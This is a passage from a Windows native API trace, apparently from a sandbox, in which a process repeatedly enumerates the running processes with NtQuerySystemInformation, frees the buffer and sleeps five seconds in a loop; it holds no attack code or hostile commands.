ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.499] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.500] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.501] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.501] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.506] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.507] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.509] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.509] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.510] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.517] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.519] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.523] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.528] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.528] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.532] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.535] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.535] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.535] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.539] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.539] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.541] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.541] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.542] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.542] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.542] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.546] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.548] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.549] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.550] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.551] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.551] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.555] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.556] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.557] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.558] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.559] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.559] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.559] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.563] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.565] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.565] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.566] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.566] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.567] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.571] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.572] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.574] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.577] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.581] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.581] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.583] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.583] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.584] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.584] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.589] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.590] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.591] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.591] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.596] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.596] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.598] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.598] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.599] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.600] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.600] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.604] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.606] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.606] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.607] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.611] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.612] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.614] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.614] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.615] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.615] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.616] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.621] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.621] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.625] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.625] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.629] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.630] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.631] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.631] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.632] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.632] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.632] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.636] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.636] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.638] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.640] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.644] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.645] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.648] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.648] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.649] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.649] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.649] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.653] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.654] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.656] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.656] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.657] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.657] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.657] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0221.661] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0221.662] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0221.664] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0221.664] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0221.665] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0221.665] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0221.665] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 